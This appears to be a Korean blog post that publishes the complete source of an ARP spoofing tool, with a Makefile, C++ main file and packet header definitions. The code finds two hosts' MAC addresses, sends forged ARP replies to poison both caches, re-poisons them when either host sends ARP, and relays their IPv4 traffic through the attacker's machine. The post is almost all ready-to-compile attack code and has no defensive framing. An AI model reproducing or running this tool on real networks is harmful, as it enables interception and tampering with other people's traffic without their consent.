인기포스트 MORE POST

    -

ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • ARP Spoofing Tool ( + 자동화 , 코드 보완 )
    Network/NetProg 2020. 2. 6. 19:01

    Makefile

    all : ARP_Spoofing

ARP_Spoofing : main.o
	g++ -g -std=c++14 -o ARP_Spoofing main.o -lpcap -lpthread

main.o : psy_header.h
	g++ -g -c -std=c++14 -o main.o main.cpp

clean :
	rm -f *.o ARP_Spoofing

     

     

    main.cpp

    #include <pcap.h>   // pcap libc
#include <unistd.h>
#include <iostream>
#include <cstdlib>
#include <cstring>
#include <netinet/ether.h> // find_me()
#include <net/ethernet.h>   // find_me()
#include <arpa/inet.h>  // inet libc
#include <thread>       // Thread libc
#include "psy_header.h"     // header define
using namespace std;

#define PKT_SIZE (sizeof(eth_header)+sizeof(arp_header))

uint8_t find_chk_S = 0;
uint8_t find_chk_T = 0;

char FILTER_RULE[BUF_SIZ] = "ether dst ";
pcap_t *use_dev;
struct ether_addr my_mac;
struct sockaddr_in my_ip;
struct sockaddr_in G_Sender_ip;
struct sockaddr_in G_Target_ip;
uint8_t sender_mac[6];
uint8_t target_mac[6];

void err_print(int err_num)
{
    switch(err_num)
    {
    case 0:
        cout <<"ARP_Spoofing [Interface] [Sender_IP] [Target_IP]" <<endl;
        break;
    case 1:
        cout <<"PCAP_OPEN_ERROR!\n" <<endl;
        break;
    case 2:
        cout <<"PCAP_COMPILE_ERROR!\n" <<endl;
        break;
    case 3:
        cout <<"PCAP_SET_FILTER_ERROR!\n"<<endl;
        break;
    case 4:
        cout <<"THREAD_CREATE_ERROR!\n"<<endl;
        break;
    default:
        cout <<"Unknown ERROR!\n"<<endl;
        break;

    }
}

void send_Req_arp(char *sender_ip,char *target_ip)
{
    struct mine m;
    uint8_t packet[PKT_SIZE];
    inet_aton(target_ip,&G_Target_ip.sin_addr);
    inet_aton(sender_ip,&G_Sender_ip.sin_addr);

    while(!find_chk_T||!find_chk_S) // Not Find S or T
    {
        memcpy(m.src_mac,my_mac.ether_addr_octet,6);
        memcpy(m.s_mac,my_mac.ether_addr_octet,6);
        m.oper=0x0100;
        m.s_ip=my_ip.sin_addr;
        m.t_ip=G_Sender_ip.sin_addr;
        memcpy(packet,&m,PKT_SIZE);

        //sender_BROADCAST
        if(pcap_sendpacket(use_dev,packet,PKT_SIZE)!=0)
        {
            printf("SEND PACKET ERROR!\n");
            exit(1);
        }

        m.t_ip=G_Target_ip.sin_addr;
        memcpy(packet,&m,PKT_SIZE);

        //target_BROADCAST
        if(pcap_sendpacket(use_dev,packet,PKT_SIZE)!=0)
        {
            printf("SEND PACKET ERROR!\n");
            exit(1);
        }
        sleep(1);
    }
}

void send_infect_arp(const u_int8_t *pkt_data, u_int8_t chk_first)
{
    struct mine m_S;
    struct mine m_T;
    struct eth_header *eh;
    uint8_t packet[PKT_SIZE];

    eh = (struct eth_header *)pkt_data;

    // Sender_Infection_setting
    memcpy(m_S.des_mac,sender_mac,6);
    memcpy(m_S.src_mac,my_mac.ether_addr_octet,6);
    m_S.s_ip=G_Target_ip.sin_addr;
    memcpy(m_S.s_mac,my_mac.ether_addr_octet,6);
    m_S.t_ip=G_Sender_ip.sin_addr;
    memcpy(m_S.t_mac,sender_mac,6);

    // Target_Infection_setting
    memcpy(m_T.des_mac,target_mac,6);
    memcpy(m_T.src_mac,my_mac.ether_addr_octet,6);
    m_T.s_ip=G_Sender_ip.sin_addr;
    memcpy(m_T.s_mac,my_mac.ether_addr_octet,6);
    m_T.t_ip=G_Target_ip.sin_addr;
    memcpy(m_T.t_mac,target_mac,6);

    if(chk_first)
    {
        memcpy(packet,&m_S,PKT_SIZE);
       if(pcap_sendpacket(use_dev,packet,PKT_SIZE)!=0)
            {
                printf("SEND_PACKET_ERROR!\n");
                exit(1);
            }

       memcpy(packet,&m_T,PKT_SIZE);
       if(pcap_sendpacket(use_dev,packet,PKT_SIZE)!=0)
            {
                printf("SEND_PACKET_ERROR!\n");
                exit(1);
            }
       cout<< "SEND_INFECTION_ARP!\n"<<endl;
    }


    if( (!(memcmp(eh->src_mac,sender_mac,6))) || (!(memcmp(eh->src_mac,target_mac,6))) )
    {
        memcpy(packet,&m_S,PKT_SIZE);
       if(pcap_sendpacket(use_dev,packet,PKT_SIZE)!=0)
            {
                printf("SEND_PACKET_ERROR!\n");
                exit(1);
            }

       memcpy(packet,&m_T,PKT_SIZE);
       if(pcap_sendpacket(use_dev,packet,PKT_SIZE)!=0)
            {
                printf("SEND_PACKET_ERROR!\n");
                exit(1);
            }
       cout<< "SEND_RECOVERY_ARP!\n"<<endl;
    }
}

void pkt_relay(const u_int8_t *pkt_data,bpf_u_int32 caplen)
{
    struct eth_header *eh;
    eh = (struct eth_header *)pkt_data;

        if(!(memcmp(eh->src_mac,sender_mac,sizeof(eh->src_mac))))
        {
            cout << "Sender PKT IN ::"<<endl;
            memcpy(eh->src_mac,my_mac.ether_addr_octet,sizeof(eh->src_mac));
            memcpy(eh->des_mac,target_mac,sizeof(eh->des_mac));

        }
        if(!(memcmp(eh->src_mac,target_mac,sizeof(eh->src_mac))))
        {
            cout << "Target PKT IN ::"<<endl;
            memcpy(eh->src_mac,my_mac.ether_addr_octet,sizeof(eh->src_mac));
            memcpy(eh->des_mac,sender_mac,sizeof(eh->des_mac));
        }

    pcap_sendpacket(use_dev,pkt_data,caplen);
}

void init_dev(char *dev_name)
{
    char errbuf[ERRBUF_SIZ];
    struct bpf_program rule_struct;

    if((use_dev=pcap_open_live(dev_name,SNAPLEN,1,1000,errbuf))==NULL)
    {
        err_print(1);
        exit(1);
    }

    if(pcap_compile(use_dev,&rule_struct,FILTER_RULE,1,NULL)<0)
    {
        err_print(2);
        exit(1);
    }
    if(pcap_setfilter(use_dev,&rule_struct)<0)
    {
        err_print(3);
        exit(1);
    }
     cout <<":: DEVICE SETTING SUCCESS ::"<<endl;
}

void find_mac(const uint8_t *pkt_data,char *sender_ip,char *target_ip)
{
    struct arp_header *ah;
    ah = (struct arp_header *)pkt_data;

    struct sockaddr_in sender;
    struct sockaddr_in target;

    inet_aton(sender_ip,&sender.sin_addr);
    inet_aton(target_ip,&target.sin_addr);

    if(ah->s_ip.s_addr == sender.sin_addr.s_addr)
    {
        memcpy(sender_mac,ah->s_mac,sizeof(ah->s_mac));

        cout << "SENDER_FIND!\nSENDER_MAC : ";
        for(int i=0; i<6; i++)
            printf("%02X ",sender_mac[i]);
        cout <<"\n"<<endl;
        find_chk_S = 1;
    }

    if(ah->s_ip.s_addr == target.sin_addr.s_addr)
    {
        memcpy(target_mac,ah->s_mac,sizeof(ah->s_mac));

        cout << "TARGET_MAC FIND!\nTARGET_MAC : ";
        for(int i=0; i<6; i++)
            printf("%02X ",target_mac[i]);
        cout <<"\n"<<endl;
        find_chk_T=1;
    }

    if(find_chk_S && find_chk_T) send_infect_arp(pkt_data,1);
}

void find_me(char *dev_name)
{
    FILE *ptr;
    char MAC[20];
    char IP[20]={0,};
    char cmd[300]={0x0};

    //MY_MAC FIND
    sprintf(cmd,"ifconfig %s | grep HWaddr | awk '{print $5}'",dev_name);
    ptr = popen(cmd, "r");
    fgets(MAC, sizeof(MAC), ptr);
    pclose(ptr);
    ether_aton_r(MAC, &my_mac);
    strcat(FILTER_RULE,MAC);

    //MY_IP FIND
    sprintf(cmd,"ifconfig %s | egrep 'inet addr:' | awk '{print $2}'",dev_name);
    ptr = popen(cmd, "r");
    fgets(IP, sizeof(IP), ptr);
    pclose(ptr);
    inet_aton(IP+5,&my_ip.sin_addr);
}

void cap_pkt(char *sender_ip,char *target_ip)
{
    struct pcap_pkthdr *header;
    const uint8_t *pkt_data;
    int res;
    struct eth_header *eh;
    u_int16_t eth_type;
   while((res = pcap_next_ex(use_dev,&header,&pkt_data))>=0)
    {
        if(res == 0) continue;
        eh = (struct eth_header *)pkt_data;
        eth_type = ntohs(eh->eth_type);

        if(find_chk_S && find_chk_T && eth_type == 0x0806) send_infect_arp(pkt_data,0);
        else if (find_chk_S && find_chk_T && eth_type == 0x0800) pkt_relay(pkt_data,header->caplen);

        pkt_data += sizeof(struct eth_header);
        if(!find_chk_S || !find_chk_T) find_mac(pkt_data,sender_ip,target_ip);
    }
}

int main(int argc, char **argv)
{
    if(argc != 4)
    {
        err_print(0);
        return -1;
    }
    find_me(argv[1]);
    init_dev(argv[1]);
    thread t1(cap_pkt,argv[2],argv[3]);
    send_Req_arp(argv[2],argv[3]);

    t1.join();
    pcap_close(use_dev);
}

     

     

    psy_header.h

    #include <netinet/in.h>

#define ERRBUF_SIZ 1024
#define SNAPLEN 65536
#define BUF_SIZ 1024

#pragma pack(push, 2)
struct mine
{
    uint8_t des_mac[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};
    uint8_t src_mac[6];
    uint16_t eth_type=0x0608;

    uint16_t hrd_type=0x0100;//2
    uint16_t proto_type=0x0008;//4
    uint8_t hrd_len=0x06;//5
    uint8_t proto_len=0x04;//6
    uint16_t oper=0x0200;//8
    uint8_t s_mac[6]; //14
    struct in_addr s_ip; // 18
    uint8_t t_mac[6]={0x00,0x00,0x00,0x00,0x00,0x00}; //24
    struct in_addr t_ip; // 28
};
#pragma pack(pop)

struct eth_header
{
    uint8_t des_mac[6];
    uint8_t src_mac[6];
    uint16_t eth_type;
    //14bytes
};

#pragma pack(push, 2)
struct arp_header
{
    uint16_t hrd_type;//2
    uint16_t proto_type;//4
    uint8_t hrd_len;//5
    uint8_t proto_len;//6
    uint16_t oper;//8
    uint8_t s_mac[6]; //14
    struct in_addr s_ip; // 18
    uint8_t t_mac[6]; //24
    struct in_addr t_ip; // 28
};
#pragma pack(pop)

struct ip_header
{
    uint8_t ip_version : 4;
    uint8_t ip_header_length : 4;
    uint8_t ip_TOS;
    uint16_t ip_total_length;
    uint16_t ip_iden;
    uint8_t flag_x : 1;
    uint8_t flag_D : 1;
    uint8_t flag_M : 1;
    uint8_t offset_part_1 : 5;
    uint8_t offset_part_2;
    uint8_t TTL;
    uint8_t ip_protocol;
    uint16_t chk_sum;
    struct in_addr ip_src_add;
    struct in_addr ip_des_add;
    //20bytes
};

struct tcp_header
{
    uint16_t src_port;
    uint16_t des_port;
    uint32_t sqn_num;
    uint32_t ack_num;
    uint8_t offset : 4;
    uint8_t ns : 1;
    uint8_t reserve : 3;
    uint8_t flag_cwr : 1;
    uint8_t flag_ece : 1;
    uint8_t flag_urgent : 1;
    uint8_t flag_ack : 1;
    uint8_t flag_push : 1;
    uint8_t flag_reset : 1;
    uint8_t flag_syn : 1;
    uint8_t flag_fin : 1;
    uint16_t window;
    uint16_t chk_sum;
    uint16_t urgent_point;
    //20bytes
};
    저작자표시

    'Network > NetProg' 카테고리의 다른 글

    [C / lpcap] ARP Spoofing  (1) 2017.12.14
    [WINPCAP] 스니핑 프로그램  (8) 2017.10.05

    관련글 관련글 더보기

    댓글

Designed by Tistory.

티스토리툴바